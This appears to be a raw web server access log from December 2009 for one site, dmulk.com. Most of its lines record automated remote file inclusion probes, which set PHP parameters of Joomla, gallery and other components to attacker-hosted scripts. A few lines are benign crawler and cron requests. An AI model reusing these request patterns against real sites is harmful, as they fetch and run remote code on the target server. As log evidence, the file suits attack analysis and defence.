91.121.181.60 - - [14/Dec/2009:10:32:49 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:32:49 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:32:49 -0800] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:32:53 -0800] "GET /logs/access_081103.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:33:01 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:33:01 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:33:01 -0800] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:33:04 -0800] "GET /logs/access_081103.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:26 -0800] "GET /logs/access_080420.log%20%20/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:27 -0800] "GET /logs/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130230 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:30 -0800] "GET ////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14926 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:37 -0800] "GET /logs/access_080420.log%20%20/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:37 -0800] "GET /logs/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130230 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:34:38 -0800] "GET ////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14925 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:29 -0800] "GET /logs/access_080519.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:35:31 -0800] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:35:31 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:35:31 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:35:35 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:41 -0800] "GET /logs/access_081103.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:46 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:46 -0800] "GET /logs/access_080412.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:52 -0800] "GET /logs/access_080519.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:55 -0800] "GET /logs/access_080410.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:57 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:35:57 -0800] "GET /logs/access_080412.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:10:36:02 -0800] "GET /logs/access_080619.log/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:36:03 -0800] "GET /logs/access_080410.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:36:05 -0800] "GET /logs/access_081103.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:37:12 -0800] "GET /logs/access_090523.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:37:12 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 130226 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:10:37:14 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:37:14 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 14949 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:10:37:19 -0800] "GET /logs/access_080619.log/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:10:37:19 -0800] "GET /logs/access_080909.log/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:37:29 -0800] "GET /logs/access_080211.log%20%20/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:10:37:32 -0800] "GET /logs/access_080211.log%20%20/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:37:47 -0800] "GET /logs/access_080412.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:37:48 -0800] "GET /logs/access_080412.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:37:48 -0800] "GET /logs/access_080410.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:37:48 -0800] "GET /logs/access_080410.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:10:38:28 -0800] "GET /logs/access_080909.log/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:23 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:23 -0800] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:23 -0800] "GET /logs/access_080119.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:24 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:37 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:37 -0800] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:37 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:39:43 -0800] "GET /logs/access_080119.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:41:11 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 14948 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:41:11 -0800] "GET /logs/access_090523.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:41:12 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 130226 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:45:28 -0800] "GET /logs/access_080420.log%20%20/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:45:28 -0800] "GET /logs/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 200 130230 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:45:30 -0800] "GET ////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:45:51 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:45:51 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:45:51 -0800] "GET /logs/access_080410.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:45:55 -0800] "GET /logs/access_090808.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:47:54 -0800] "GET /memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:47:54 -0800] "GET /logs//memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:47:54 -0800] "GET /logs/access_080410.log%20%20//memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:48:00 -0800] "GET /memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:48:00 -0800] "GET /logs/access_080410.log%20%20//memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:48:00 -0800] "GET /logs//memories//admin.php?include_path=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:48:16 -0800] "GET ////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 200 14926 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:48:16 -0800] "GET /logs/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 200 130230 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:48:22 -0800] "GET /logs/access_080420.log/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:48:37 -0800] "GET /logs/access_080211.log%20%20/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:08 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:08 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:08 -0800] "GET /logs/access_080410.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:08 -0800] "GET /logs/access_090808.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:49:11 -0800] "GET /logs/access_080410.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:49:12 -0800] "GET /logs/access_090808.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:40 -0800] "GET /logs/access_080927.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:40 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:40 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:46 -0800] "GET /logs/access_080927.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:46 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:49:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:50:21 -0800] "GET /logs/access_080317.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:50:28 -0800] "GET /logs/access_080317.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:10:50:41 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
85.100.11.120 - - [14/Dec/2009:10:50:42 -0800] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 14792 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:51:54 -0800] "GET /logs/access_080210.log%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:52:25 -0800] "GET /logs/access_080210.log%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.92 - - [14/Dec/2009:10:52:40 -0800] "GET /logs/access_080211.log/////////?cmd&file=http://phoenix-model.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:52:46 -0800] "GET /logs/access_090510.log%20%20/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:10:52:52 -0800] "GET /logs/access_081230.log%20%20/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:54:33 -0800] "GET /logs/access_080909.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:10:54:56 -0800] "GET /logs/access_080327.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:47 -0800] "GET /members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:47 -0800] "GET /logs//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:47 -0800] "GET /logs/access_090510.log%20%20//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:49 -0800] "GET /members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:52 -0800] "GET /logs/access_090511.log%20%20//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:54 -0800] "GET /logs//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:54 -0800] "GET /logs/access_090510.log%20%20//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:55:54 -0800] "GET /logs/access_090511.log%20%20//members/?INC=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:57:00 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:58:05 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.195.115.237 - - [14/Dec/2009:10:58:59 -0800] "GET /blog/wp-login.php HTTP/1.0" 200 1965 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:10:59:02 -0800] "GET /blog/wp-admin/css/login.css?ver=20090514 HTTP/1.0" 200 2164 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [14/Dec/2009:10:59:03 -0800] "GET /blog/wp-admin/css/colors-fresh.css?ver=20090625 HTTP/1.0" 200 31581 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:01:05 -0800] "GET /logs/access_090512.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:01:05 -0800] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:01:05 -0800] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:32 -0800] "GET /logs/access_080919.log%20%20/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:33 -0800] "GET /logs/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:33 -0800] "GET /random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:01:37 -0800] "GET /logs/access_090710.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:38 -0800] "GET /random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:38 -0800] "GET /logs/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:38 -0800] "GET /logs/access_080919.log%20%20/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:50 -0800] "GET /logs/access_080919.log/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:01:55 -0800] "GET /logs/access_080919.log/random2.php?path_to_folder=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
